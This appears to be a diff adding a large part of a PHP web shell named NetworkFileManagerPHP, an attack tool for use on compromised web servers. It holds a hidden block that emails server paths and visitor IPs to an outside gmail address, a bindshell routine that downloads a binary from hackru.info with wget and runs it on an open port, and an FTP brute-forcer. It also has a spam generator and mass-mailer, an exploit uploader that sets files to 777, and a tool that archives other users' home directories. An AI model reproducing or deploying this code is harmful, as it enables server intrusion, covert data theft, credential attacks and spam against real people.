+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "?????";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  ?????????? ????? <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
